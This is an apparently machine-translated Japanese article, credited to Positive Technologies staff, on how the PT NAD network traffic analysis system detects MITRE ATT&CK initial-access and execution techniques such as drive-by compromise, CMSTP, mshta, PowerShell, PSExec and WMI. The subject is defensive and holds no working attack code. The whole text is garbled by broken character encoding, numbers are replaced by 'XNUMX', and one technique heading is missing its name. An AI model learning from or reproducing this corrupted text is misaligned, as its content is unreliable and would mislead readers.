ãã°ãåéããŠã€ãã³ããåæãã SIEM ããã§ã«å®è¡ãããŠããããŠã€ã«ã¹å¯ŸçãœãããŠã§ã¢ããšã³ã ããŒãã«ã€ã³ã¹ããŒã«ãããŠãããšããŸãã ããã«ããããããã
NTA ã«ã¯ XNUMX ã€ã®ã¿ã€ãããããŸããXNUMX ã€ã¯ NetFlow ã§åäœãããã XNUMX ã€ã¯çã®ãã©ãã£ãã¯ãåæããŸãã XNUMX çªç®ã®ã·ã¹ãã ã®å©ç¹ã¯ãçã®ãã©ãã£ãã¯èšé²ãä¿åã§ããããšã§ãã ãã®ãããã§ãæ å ±ã»ãã¥ãªãã£ã®å°é家ã¯ãæ»æã®æåã確èªããè åšã®å Žæãç¹å®ããæ»æãã©ã®ããã«çºçããã®ãããããŠä»åŸåæ§ã®æ»æãé²ãæ¹æ³ãç解ããããšãã§ããŸãã
NTA ã䜿çšããŠããã¬ããž ããŒã¹ã«èšèŒãããŠãããã¹ãŠã®æ¢ç¥ã®æ»ææŠè¡ãçŽæ¥çãŸãã¯éæ¥çãªå
åã«ãã£ãŠèå¥ããæ¹æ³ã瀺ããŸãã
ATT&CK ãã¬ããžããŒã¹ã«ã€ããŠ
MITRE ATT&CK ã¯ãå®éã® APT ã®åæã«åºã¥ã㊠MITRE Corporation ã«ãã£ãŠéçºããã³ç¶æãããŠããå ¬éç¥èããŒã¹ã§ãã ããã¯ãæ»æè ã䜿çšããæ§é åãããæŠè¡ãšãã¯ããã¯ã®ã»ããã§ãã ããã«ãããäžçäžã®æ å ±ã»ãã¥ãªãã£å°é家ãåãèšèªã話ãããšãã§ããããã«ãªããŸãã ããŒã¿ããŒã¹ã¯åžžã«æ¡åŒµãããŠãããæ°ããç¥èãè¿œå ãããŠããŸãã
ããŒã¿ããŒã¹ã§ã¯ããµã€ããŒæ»æã®æ®µéã«åãããã 12 ã®æŠè¡ãç¹å®ãããŠããŸãã
- åæã¢ã¯ã»ã¹ (åæã¢ã¯ã»ã¹);
- å®è¡ïŒå®è¡ïŒã
- çµ±åïŒæ°žç¶æ§ïŒã
- ç¹æš©ææ Œã
- æ¢ç¥é²æ¢ïŒé²åŸ¡åé¿ïŒã
- è³æ Œæ å ±ã®ååŸ (è³æ Œæ å ±ãžã®ã¢ã¯ã»ã¹)ã
- ã€ã³ããªãžã§ã³ã¹ïŒçºèŠïŒã
- åšå²å ã®åãïŒæšªæ¹åã®åãïŒã
- ããŒã¿åéïŒåéïŒ;
- ã³ãã³ããšå¶åŸ¡;
- ããŒã¿ã®åŒãåºãã
- ã€ã³ãã¯ãã
ATT&CK Knowledge Base ã«ã¯ãåæŠè¡ã«ã€ããŠãæ»æã®çŸåšã®æ®µéã§æ»æè ãç®çãéæããã®ã«åœ¹ç«ã€ãã¯ããã¯ã®ãªã¹ãããªã¹ããããŠããŸãã åããã¯ããã¯ãç°ãªãã¹ããŒãžã§äœ¿çšã§ãããããè€æ°ã®æŠè¡ãåç §ã§ããŸãã
åãã¯ããã¯ã®èª¬æã¯æ¬¡ã®ãšããã§ãã
- èå¥å;
- ããã䜿çšãããæŠè¡ã®ãªã¹ãã
- APT ã°ã«ãŒãã«ãã䜿çšäŸã
- 䜿çšã«ãã被害ã軜æžããããã®æªçœ®ã
- æ€åºã«é¢ããæšå¥šäºé ã
æ
å ±ã»ãã¥ãªãã£ã®å°é家ã¯ãããŒã¿ããŒã¹ã®ç¥èã䜿çšããŠçŸåšã®æ»æææ³ã«é¢ããæ
å ±ãæ§é åããããã念é ã«çœ®ããŠå¹æçãªã»ãã¥ãªã㣠ã·ã¹ãã ãæ§ç¯ã§ããŸãã å®éã® APT ã°ã«ãŒããã©ã®ããã«åäœããããç解ããããšã¯ãAPT ã°ã«ãŒãå
ã®è
åšãäºåã«æ¢çŽ¢ããããã®ä»®èª¬ã®ãœãŒã¹ã«ããªãåŸãŸãã
PT ãããã¯ãŒã¯æ»ææ€åºã«ã€ããŠ
ã·ã¹ãã ã䜿çšããŠATT & CKãããªãã¯ã¹ãããã¯ããã¯ã®äœ¿çšãç¹å®ããŸã
ã·ã¹ãã ã¯ãã³ãã³ãã«ãã£ãŠäœæãããæ€åºã«ãŒã«ã䜿çšããŠãATT&CK ãã¯ããã¯ã䜿çšããŠæ»æãæ€åºããŸãã
ããã« PT NAD ãã MITRE ATT&CK ãããªãã¯ã¹ãžã®å®å šãªãããã³ã°ã ç»åã倧ããã®ã§å¥ãŠã£ã³ããŠã§ã芧ããã ãããšããå§ãããŸãã
åæã¢ã¯ã»ã¹
åæã¢ã¯ã»ã¹æŠè¡ã«ã¯ãäŒæ¥ã®ãããã¯ãŒã¯ã«äŸµå
¥ããææ³ãå«ãŸããŸãã ãã®æ®µéã§ã®æ»æè
ã®ç®æšã¯ãæ»æ察象ã®ã·ã¹ãã ã«æªæã®ããã³ãŒããé
ä¿¡ãããããããã«å®è¡ãããããã«ããããšã§ãã
PT NAD ãã©ãã£ãã¯åæã«ãããåæã¢ã¯ã»ã¹ãååŸããããã® XNUMX ã€ã®ãã¯ããã¯ãæããã«ãªããŸããã
1. T1189 : ãã©ã€ããã€ã®åŠ¥å
被害è ã Web ãã©ãŠã¶ãæªçšããŠã¢ããªã±ãŒã·ã§ã³ ã¢ã¯ã»ã¹ ããŒã¯ã³ãååŸããããã«æ»æè ã䜿çšãã Web ãµã€ããéãææ³ã
PT NADã¯äœãããŸãã?: Web ãã©ãã£ãã¯ãæå·åãããŠããªãå ŽåãPT NAD 㯠HTTP ãµãŒããŒå¿çã®å 容ãæ€æ»ããŸãã ãããã®åçã§ã¯ãæ»æè ããã©ãŠã¶å ã§ä»»æã®ã³ãŒããå®è¡ã§ããããã«ãããšã¯ã¹ããã€ããçºèŠãããŠããŸãã PT NAD ã¯ãæ€åºã«ãŒã«ã䜿çšããŠãã®ãããªãšã¯ã¹ããã€ããèªåçã«æ€åºããŸãã
ããã«ãPT NAD ã¯åã®ã¹ãããã§è åšãæ€åºããŸãã ãŠãŒã¶ãŒãå€æ°ã®ãšã¯ã¹ããã€ããå«ããµã€ãã«ãªãã€ã¬ã¯ãããããµã€ãã«ã¢ã¯ã»ã¹ãããšã䟵害ã®ã«ãŒã«ãšã€ã³ãžã±ãŒã¿ãŒãããªã¬ãŒãããŸãã
2. T1190 : å
¬éã¢ããªã±ãŒã·ã§ã³ãæªçšãã
ã€ã³ã¿ãŒãããããã¢ã¯ã»ã¹ã§ãããµãŒãã¹ã®è匱æ§ã®æªçšã
PT NADã¯äœãããŸãã?: ãããã¯ãŒã¯ ãã±ããã®å 容ã詳现ã«æ€æ»ãããã±ããå ã®ç°åžžãªã¢ã¯ãã£ããã£ã®å åãæããã«ããŸãã ç¹ã«ãäž»èŠãªã³ã³ãã³ã管çã·ã¹ãã (CMS)ããããã¯ãŒã¯æ©åšã® Web ã€ã³ã¿ãŒãã§ã€ã¹ã«å¯Ÿããæ»æãã¡ãŒã«ããã³ FTP ãµãŒããŒã«å¯Ÿããæ»æãæ€åºã§ããã«ãŒã«ããããŸãã
3. T1133 : å€éšãªã¢ãŒããµãŒãã¹
æ»æè ã¯ãªã¢ãŒã ã¢ã¯ã»ã¹ ãµãŒãã¹ã䜿çšããŠãå€éšããå éšãããã¯ãŒã¯ ãªãœãŒã¹ã«æ¥ç¶ããŸãã
PT NADã¯äœãããŸãã?: ã·ã¹ãã ã¯ããŒãçªå·ã§ã¯ãªããã±ããã®å 容ã«ãã£ãŠãããã³ã«ãèªèãããããã·ã¹ãã ãŠãŒã¶ãŒã¯ãªã¢ãŒã ã¢ã¯ã»ã¹ ãããã³ã«ã®ãã¹ãŠã®ã»ãã·ã§ã³ãèŠã€ããŠãã®æ£åœæ§ããã§ãã¯ãããããªæ¹æ³ã§ãã©ãã£ãã¯ããã£ã«ã¿ãªã³ã°ã§ããŸãã
4. T1193 : ã¹ãã¢ãã£ãã·ã³ã°æ·»ä»ãã¡ã€ã«
æªåé«ããã£ãã·ã³ã°æ·»ä»ãã¡ã€ã«ã®éä¿¡ã«ã€ããŠè©±ããŠããŸãã
PT NADã¯äœãããŸãã?: ãã©ãã£ãã¯ãããã¡ã€ã«ãèªåçã«æœåºãã䟵害ã®å åãšç §åããŠãã§ãã¯ããŸãã æ·»ä»ãã¡ã€ã«å ã®å®è¡å¯èœãã¡ã€ã«ã¯ãã¡ãŒã« ãã©ãã£ãã¯ã®å 容ãåæããã«ãŒã«ã«ãã£ãŠæ€åºãããŸãã äŒæ¥ç°å¢ã§ã¯ããã®ãããªæè³ã¯ç°åžžãšã¿ãªãããŸãã
5. T1192 : ã¹ãã¢ãã£ãã·ã³ã°ãªã³ã¯
ãã£ãã·ã³ã°ãªã³ã¯ã®äœ¿çšã ãã®ææ³ã§ã¯ãæ»æè ããªã³ã¯ãå«ããã£ãã·ã³ã°ã¡ãŒã«ãéä¿¡ãããã®ãªã³ã¯ãã¯ãªãã¯ãããšæªæã®ããããã°ã©ã ãããŠã³ããŒããããŸãã ååãšããŠããªã³ã¯ã«ã¯ãœãŒã·ã£ã« ãšã³ãžãã¢ãªã³ã°ã®ãã¹ãŠã®ã«ãŒã«ã«åŸã£ãŠç·šéãããããã¹ããæ·»ä»ãããŸãã
PT NADã¯äœãããŸãã?: 䟵害ã®ã€ã³ãžã±ãŒã¿ãŒã䜿çšããŠãã£ãã·ã³ã° ãªã³ã¯ãæ€åºããŸãã ããšãã°ãPT NAD ã€ã³ã¿ãŒãã§ã€ã¹ã§ã¯ããã£ãã·ã³ã° ã¢ãã¬ã¹ (ãã£ãã·ã³ã° URL) ã®ãªã¹ãã«å«ãŸãããªã³ã¯ãä»ã㊠HTTP æ¥ç¶ãè¡ãããã»ãã·ã§ã³ã衚瀺ãããŸãã
䟵害ãã£ãã·ã³ã° URL ã®ã€ã³ãžã±ãŒã¿ãŒã®ãªã¹ãããã®ãªã³ã¯ãä»ããæ¥ç¶
6. T1199 ïŒä¿¡é Œé¢ä¿
被害è ãšä¿¡é Œé¢ä¿ã®ãããµãŒãããŒãã£ãä»ããŠè¢«å®³è ã®ãããã¯ãŒã¯ã«ã¢ã¯ã»ã¹ããŸãã æ»æè ã¯ä¿¡é Œã§ããçµç¹ã«äŸµå ¥ãããããçµç±ããŠã¿ãŒã²ãã ãããã¯ãŒã¯ã«æ¥ç¶ããå¯èœæ§ããããŸãã ãããè¡ãããã«ãVPN æ¥ç¶ãŸãã¯ãã¡ã€ã³ã®ä¿¡é Œé¢ä¿ã䜿çšãããŸãããããã¯ãã©ãã£ãã¯åæãéããŠæããã«ãããŸãã
PT NADã¯äœãããŸãã?: ã¢ããªã±ãŒã·ã§ã³ ãããã³ã«ã解æãã解æããããã£ãŒã«ããããŒã¿ããŒã¹ã«ä¿åããŸããããã«ãããæ å ±ã»ãã¥ãªã㣠ã¢ããªã¹ãã¯ãã£ã«ã¿ã䜿çšããŠãããŒã¿ããŒã¹å ã®ãã¹ãŠã®äžå¯©ãª VPN æ¥ç¶ãŸãã¯ã¯ãã¹ãã¡ã€ã³æ¥ç¶ãèŠã€ããããšãã§ããŸãã
7. T1078 : æå¹ãªã¢ã«ãŠã³ã
å€éšããã³å éšãµãŒãã¹ã®æ¿èªã«æšæºã®ããŒã«ã«ãŸãã¯ãã¡ã€ã³ã®è³æ Œæ å ±ã䜿çšããŸãã
PT NADã¯äœãããŸãã?: HTTPãFTPãSMTPãPOP3ãIMAPãSMBãDCE/RPCãSOCKS5ãLDAPãKerberos ãããã³ã«ããè³æ Œæ å ±ãèªåçã«ååŸããŸãã äžè¬ã«ãããã¯ãã°ã€ã³åããã¹ã¯ãŒããããã³èªèšŒæåã®å åã§ãã 䜿çšãããŠããå Žåã¯ã察å¿ããã»ãã·ã§ã³ ã«ãŒãã«è¡šç€ºãããŸãã
å®è¡
å®è¡æŠè¡ã«ã¯ãæ»æè
ã䟵害ãããã·ã¹ãã äžã§ã³ãŒããå®è¡ããããã«äœ¿çšããææ³ãå«ãŸããŸãã æªæã®ããã³ãŒããå®è¡ãããšãæ»æè
ããã¬ãŒã³ã¹ã確ç«ã (æ°žç¶æŠè¡)ãå¢çå
ã«ç§»åããŠãããã¯ãŒã¯äžã®ãªã¢ãŒã ã·ã¹ãã ãžã®ã¢ã¯ã»ã¹ãæ¡å€§ããã®ã«åœ¹ç«ã¡ãŸãã
PT NAD ã䜿çšãããšãæ»æè ãæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãã 14 ã®ãã¯ããã¯ã®äœ¿çšãç¹å®ã§ããŸãã
1. T1191 : CMSTP (Microsoft æ¥ç¶ãããŒãžã£ãŒ ãããã¡ã€ã« ã€ã³ã¹ããŒã©ãŒ)
æ»æè ãçµã¿èŸŒã¿ã® Windows CMSTP.exe ãŠãŒãã£ãªã㣠(æ¥ç¶ãããŒãžã£ãŒ ãããã¡ã€ã« ã€ã³ã¹ããŒã©ãŒ) çšã«ç¹å¥ã«äœæããæªæã®ãã .inf ã€ã³ã¹ããŒã« ãã¡ã€ã«ãæºåããæŠè¡ã CMSTP.exe ã¯ãã¡ã€ã«ããã©ã¡ãŒã¿ãšããŠåãåãããªã¢ãŒãæ¥ç¶çšã®ãµãŒãã¹ ãããã¡ã€ã«ãã€ã³ã¹ããŒã«ããŸãã ãã®çµæãCMSTP.exe ã䜿çšããŠããªã¢ãŒã ãµãŒããŒãããã€ããã㯠ãªã³ã¯ ã©ã€ãã©ãª (*.dll) ãŸãã¯ã¹ã¯ãªããã¬ãã (*.sct) ãããŠã³ããŒãããŠå®è¡ã§ããŸãã
PT NADã¯äœãããŸãã?: HTTP ãã©ãã£ãã¯å ã®ç¹æ®åœ¢åŒã® .inf ãã¡ã€ã«ã®éä¿¡ãèªåçã«æ€åºããŸãã ããã«ããªã¢ãŒã ãµãŒããŒããã®æªæã®ããã¹ã¯ãªããã¬ããããã€ããã㯠ãªã³ã¯ ã©ã€ãã©ãªã® HTTP 転éãæ€åºããŸãã
2. T1059 : ã³ãã³ãã©ã€ã³ã€ã³ã¿ãŒãã§ãŒã¹
ã³ãã³ãã©ã€ã³ã€ã³ã¿ãŒãã§ãŒã¹ãšã®å¯Ÿè©±ã ã³ãã³ã ã©ã€ã³ ã€ã³ã¿ãŒãã§ã€ã¹ã¯ãããŒã«ã«ãŸãã¯ãªã¢ãŒã (ãªã¢ãŒã ã¢ã¯ã»ã¹ ãŠãŒãã£ãªãã£ãªã©) ã§æäœã§ããŸãã
PT NADã¯äœãããŸãã?: pingãifconfig ãªã©ã®ããŸããŸãªã³ãã³ã ã©ã€ã³ ãŠãŒãã£ãªãã£ãèµ·åããã³ãã³ãã«å¿çããŠãã·ã§ã«ã®ååšãèªåçã«æ€åºããŸãã
3. T1175 : ã³ã³ããŒãã³ããªããžã§ã¯ãã¢ãã«ãšåæ£COM
COM ãŸã㯠DCOM ãã¯ãããžã䜿çšããŠããããã¯ãŒã¯ãééãããšãã«ããŒã«ã«ãŸãã¯ãªã¢ãŒã ã·ã¹ãã äžã§ã³ãŒããå®è¡ããŸãã
PT NADã¯äœãããŸãã?: æ»æè ãããã°ã©ã ãèµ·åããããã«ãã䜿çšããäžå¯©ãª DCOM åŒã³åºããæ€åºããŸãã
4. T1203 : ã¯ã©ã€ã¢ã³ãå®è¡ã®ããã®æªçš
è匱æ§ãæªçšããŠã¯ãŒã¯ã¹ããŒã·ã§ã³äžã§ä»»æã®ã³ãŒããå®è¡ããã æ»æè ã«ãšã£ãŠæãæçšãªãšã¯ã¹ããã€ãã¯ããªã¢ãŒã ã·ã¹ãã ãžã®ã¢ã¯ã»ã¹ãååŸããããã«æ»æè ã䜿çšã§ããããããªã¢ãŒã ã·ã¹ãã äžã§ã³ãŒãã®å®è¡ãå¯èœã«ãããã®ã§ãã ãã®æè¡ã¯ãæªæã®ããã¡ãŒãªã³ã° ãªã¹ãããã©ãŠã¶ãæªçšãã Web ãµã€ããããã³ã¢ããªã±ãŒã·ã§ã³ã®è匱æ§ããªã¢ãŒãã§æªçšããæ¹æ³ã«ãã£ãŠå®è£ ãããå¯èœæ§ããããŸãã
PT NADã¯äœãããŸãã?: PT NAD ã¯ãã¡ãŒã« ãã©ãã£ãã¯ã®è§£æäžã«ãæ·»ä»ãã¡ã€ã«ã«å®è¡å¯èœãã¡ã€ã«ãååšãããã©ããããã§ãã¯ããŸãã ãšã¯ã¹ããã€ããå«ãŸããå¯èœæ§ã®ããé»åã¡ãŒã«ãããªãã£ã¹ææžãèªåçã«æœåºããŸãã è匱æ§ãæªçšããè©Šã¿ã¯ãã©ãã£ãã¯ã«è¡šç€ºãããPT NAD ãèªåçã«æ€åºããŸãã
5. T1170 : ã ã·ã¥ã¿
mshta.exe ãŠãŒãã£ãªãã£ã䜿çšãããšã.hta æ¡åŒµåãæ〠Microsoft HTML ã¢ããªã±ãŒã·ã§ã³ (HTA) ãå®è¡ãããŸãã mshta ã¯ãã©ãŠã¶ã®ã»ãã¥ãªãã£èšå®ããã€ãã¹ããŠãã¡ã€ã«ãåŠçãããããæ»æè 㯠mshta.exe ã䜿çšããŠæªæã®ãã HTAãJavaScriptããŸã㯠VBScript ãã¡ã€ã«ãå®è¡ããå¯èœæ§ããããŸãã
PT NADã¯äœãããŸãã?: mshta ãä»ããŠå®è¡ããã .hta ãã¡ã€ã«ã¯ãããã¯ãŒã¯çµç±ã§ãéä¿¡ãããŸããããã¯ãã©ãã£ãã¯ã§ç¢ºèªã§ããŸãã PT NAD ã¯ããã®ãããªæªæã®ãããã¡ã€ã«ã®éä¿¡ãèªåçã«æ€åºããŸãã ãã¡ã€ã«ããã£ããã£ãããããã«é¢ããæ å ±ãã»ãã·ã§ã³ ã«ãŒãã§è¡šç€ºã§ããŸãã
6. T1086 ïŒ ãã¯ãŒã·ã§ã«
PowerShell ã䜿çšããŠæ å ±ãæ€çŽ¢ããæªæã®ããã³ãŒããå®è¡ããŸãã
PT NADã¯äœãããŸãã?: æ»æè ã«ãã£ãŠ PowerShell ããªã¢ãŒãã§äœ¿çšããããšãPT NAD ã¯ã«ãŒã«ã䜿çšããŠãããæ€åºããŸãã æªæã®ããã¹ã¯ãªããã§æãäžè¬çã«äœ¿çšããã PowerShell èšèªããŒã¯ãŒããšãSMB çµç±ã® PowerShell ã¹ã¯ãªããã®éä¿¡ãæ€åºããŸãã
7.
Windows ã¿ã¹ã¯ ã¹ã±ãžã¥ãŒã©ããã®ä»ã®ãŠãŒãã£ãªãã£ã䜿çšããŠãç¹å®ã®æéã«ããã°ã©ã ãã¹ã¯ãªãããèªåçã«å®è¡ããŸãã
PT NADã¯äœãããŸãã?: æ»æè ã¯éåžžããã®ãããªã¿ã¹ã¯ããªã¢ãŒãã§äœæããŸããããã¯ããã®ãããªã»ãã·ã§ã³ããã©ãã£ãã¯ã«è¡šç€ºãããããšãæå³ããŸãã PT NAD ã¯ãATSVC ããã³ ITaskSchedulerService RPC ã€ã³ã¿ãŒãã§ã€ã¹ã䜿çšããŠãäžå¯©ãªã¿ã¹ã¯ã®äœæããã³å€æŽæäœãèªåçã«æ€åºããŸãã
8. T1064 : ã¹ã¯ãªãã
æ»æè ã®ããŸããŸãªã¢ã¯ã·ã§ã³ãèªååããã¹ã¯ãªããã®å®è¡ã
PT NADã¯äœãããŸãã?: ãããã¯ãŒã¯äžã§ã®ã¹ã¯ãªããã®éä¿¡ããã€ãŸãã¹ã¯ãªãããèµ·åãããåã§ãæ€åºããŸãã æªåŠçã®ãã©ãã£ãã¯å ã®ã¹ã¯ãªãã ã³ã³ãã³ããæ€åºããäžè¬çãªã¹ã¯ãªããèšèªã«å¯Ÿå¿ããæ¡åŒµåãæã€ãã¡ã€ã«ã®ãããã¯ãŒã¯éä¿¡ãæ€åºããŸãã
9. T1035 : ãµãŒãã¹ã®å®è¡
Service Control Manager (SCM) ãªã©ã® Windows ãµãŒãã¹ãšå¯Ÿè©±ããŠãå®è¡å¯èœãã¡ã€ã«ãCLI åœä»€ããŸãã¯ã¹ã¯ãªãããå®è¡ããŸãã
PT NADã¯äœãããŸãã?: SMB ãã©ãã£ãã¯ãæ€æ»ãããµãŒãã¹ã®äœæãå€æŽãéå§ã®ã«ãŒã«ã«ãã£ãŠ SCM ãžã®ãªã¯ãšã¹ããæ€åºããŸãã
ãµãŒãã¹ãéå§ããææ³ã¯ããªã¢ãŒã ã³ãã³ãå®è¡ãŠãŒãã£ãªã㣠PSExec ã䜿çšããŠå®è£ ã§ããŸãã PT NAD ã¯ãPSEXESVC.exe ãã¡ã€ã«ãŸã㯠PSEXECSVC æšæºãµãŒãã¹åã䜿çšããŠãªã¢ãŒã ãã·ã³äžã§ã³ãŒããå®è¡ãããšãã«ãSMB ãããã³ã«ã解æããPSExec ã®äœ¿çšãæ€åºããŸãã ãŠãŒã¶ãŒã¯ãå®è¡ãããã³ãã³ãã®äžèŠ§ãšããã¹ãããã®ãªã¢ãŒãã³ãã³ãå®è¡ã®æ£åœæ§ã確èªããå¿ èŠããããŸãã
PT NAD ã®æ»æã«ãŒãã«ã¯ãATT&CK ãããªãã¯ã¹ã§äœ¿çšãããæŠè¡ãšãã¯ããã¯ã«é¢ããããŒã¿ã衚瀺ãããããããŠãŒã¶ãŒã¯æ»æè ãæ»æã®ã©ã®æ®µéã«ãããã©ã®ãããªç®æšãè¿œæ±ããã©ã®ãããªä»£åæªçœ®ãè¬ããã¹ãããç解ã§ããŸãã
PSExec ãŠãŒãã£ãªãã£ã®äœ¿çšã«é¢ããã«ãŒã«ã®ã¢ã¯ãã£ãåããªã¢ãŒã ãã·ã³äžã§ã³ãã³ããå®è¡ããããšããè©Šã¿ã瀺ãå¯èœæ§ããããŸãã
10. T1072 : ãµãŒãããŒãã£è£œãœãããŠã§ã¢
æ»æè
ããªã¢ãŒã管çãœãããŠã§ã¢ãŸãã¯äŒæ¥ãœãããŠã§ã¢å±éã·ã¹ãã ã«ã¢ã¯ã»ã¹ãããããã䜿çšããŠæªæã®ããã³ãŒããå®è¡ããææ³ã ãã®ãããªãœãããŠã§ã¢ã®äŸ: SCCMãVNCãTeamViewerãHBSSãAltirisã
ã¡ãªã¿ã«ããã®æè¡ã¯ããªã¢ãŒãã¯ãŒã¯ãžã®å€§èŠæš¡ãªç§»è¡ãšããã®çµæãšããŠãçããããªã¢ãŒãã¢ã¯ã»ã¹ãã£ãã«ãä»ããŠä¿è·ãããŠããªãå€æ°ã®å®¶åºçšããã€ã¹ãæ¥ç¶ãããããšã«ç¹ã«é¢é£ããŠããŸãã
PT NADã¯äœãããŸãã?ïŒãããã¯ãŒã¯äžã§ã®ãœãããŠã§ã¢ã®åäœãèªåã§æ€ç¥ããŸãã ããšãã°ãã«ãŒã«ã¯ãVNC ãããã³ã«ãä»ããæ¥ç¶ã®äºå®ãšã被害è ã®ãã¹ãã«å¯ãã« VNC ãµãŒããŒãã€ã³ã¹ããŒã«ããŠèªåçã«èµ·åãã EvilVNC ããã€ã®æšéŠ¬ã®ã¢ã¯ãã£ããã£ã«ãã£ãŠããªã¬ãŒãããŸãã ãŸããPT NAD 㯠TeamViewer ãããã³ã«ãèªåçã«æ€åºããŸããããã«ãããã¢ããªã¹ãã¯ãã£ã«ã¿ãŒã䜿çšããŠãã®ãããªã»ãã·ã§ã³ããã¹ãŠèŠã€ãããã®æ£åœæ§ã確èªã§ããŸãã
11. T1204 : ãŠãŒã¶ãŒå®è¡
ã³ãŒããå®è¡ãããå¯èœæ§ã®ãããã¡ã€ã«ããŠãŒã¶ãŒãå®è¡ããææ³ã ããšãã°ãå®è¡å¯èœãã¡ã€ã«ãéãããããã¯ããå«ã Office ããã¥ã¡ã³ããå®è¡ãããããå Žåãããã«è©²åœããŸãã
PT NADã¯äœãããŸãã?: èµ·ååã®è»¢é段éã§ãã®ãããªãã¡ã€ã«ã確èªããŸãã ãããã«é¢ããæ å ±ã¯ãããããéä¿¡ãããã»ãã·ã§ã³ã®ã«ãŒãã§ç¢ºèªã§ããŸãã
12. T1047 : Windows 管çã€ã³ã¹ãã«ã¡ã³ããŒã·ã§ã³
Windows ã·ã¹ãã ã³ã³ããŒãã³ããžã®ããŒã«ã«ããã³ãªã¢ãŒã ã¢ã¯ã»ã¹ãæäŸãã WMI ããŒã«ã®äœ¿çšã WMI ã䜿çšãããšãæ»æè ã¯ããŒã«ã« ã·ã¹ãã ããªã¢ãŒã ã·ã¹ãã ãšå¯Ÿè©±ããã€ã³ããªãžã§ã³ã¹ç®çã®æ å ±åéãæ°Žå¹³æ¹åã®ç§»åäžã«ããã»ã¹ããªã¢ãŒãã§èµ·åãããªã©ãããŸããŸãªã¿ã¹ã¯ãå®è¡ã§ããŸãã
PT NADã¯äœãããŸãã?: WMI ãä»ãããªã¢ãŒã ã·ã¹ãã ãšã®å¯Ÿè©±ã¯ãã©ãã£ãã¯ã«è¡šç€ºããããããPT NAD 㯠WMI ã»ãã·ã§ã³ã確ç«ããããã®ãããã¯ãŒã¯èŠæ±ãèªåçã«æ€åºããWMI ã䜿çšããã¹ã¯ãªãããéä¿¡ãããŠãããã©ãããã©ãã£ãã¯ããã§ãã¯ããŸãã
13. T1028 : Windows ãªã¢ãŒã管ç
ãŠãŒã¶ãŒããªã¢ãŒã ã·ã¹ãã ãšå¯Ÿè©±ã§ããããã«ãã Windows ãµãŒãã¹ãšãããã³ã«ã䜿çšããŸãã
PT NADã¯äœãããŸãã?: Windows ãªã¢ãŒã管çã䜿çšããŠç¢ºç«ããããããã¯ãŒã¯æ¥ç¶ã衚瀺ããŸãã ãã®ãããªã»ãã·ã§ã³ã¯ã«ãŒã«ã«ãã£ãŠèªåçã«æ€åºãããŸãã
14. T1220 : XSL (Extensible Stylesheet Language) ã¹ã¯ãªããåŠç
XSL ã¹ã¿ã€ã«ã®ããŒã¯ã¢ããèšèªã¯ãXML ãã¡ã€ã«å ã®ããŒã¿ã®åŠçãšã¬ã³ããªã³ã°ãèšè¿°ããããã«äœ¿çšãããŸãã è€éãªæäœããµããŒãããããã«ãXSL æšæºã«ã¯è€æ°ã®èšèªã§ã®ã€ã³ã©ã€ã³ ã¹ã¯ãªããã®ãµããŒããå«ãŸããŠããŸãã ãããã®èšèªã§ã¯ããã¯ã€ããªã¹ãã«ç»é²ãããã»ãã¥ãªã㣠ããªã·ãŒããã€ãã¹ããä»»æã®ã³ãŒãã®å®è¡ãèš±å¯ãããŸãã
PT NADã¯äœãããŸãã?: ãããã¯ãŒã¯äžã§ã®ãã®ãããªãã¡ã€ã«ã®éä¿¡ããã€ãŸããã¡ã€ã«ãèµ·åãããåã§ãã£ãŠãæ€åºããŸãã ãããã¯ãŒã¯äžã§éä¿¡ãããŠãã XSL ãã¡ã€ã«ãšãç°åžžãª XSL ããŒã¯ã¢ãããæã€ãã¡ã€ã«ãèªåçã«æ€åºããŸãã
次ã®è³æã§ã¯ãPT Network Attack Discovery NTA ã·ã¹ãã ã MITRE ATT & CK ã«åŸã£ãŠæ»æè ã®ä»ã®æŠè¡ããã¯ããã¯ãã©ã®ããã«æ€åºããããèŠãŠãããŸãã ä¹ããæåŸ ïŒ
èè :
- Anton Kutepov æ°ããšãã¹ããŒã ã»ãã¥ãªã㣠ã»ã³ã¿ãŒ (PT Expert Security Center) ã®ã¹ãã·ã£ãªã¹ã Positive Technologies
- Natalia Kazankova æ°ãPositive Technologies ã®è£œåããŒã±ãã£ã³ã°æ åœè
åºæïŒ habr.com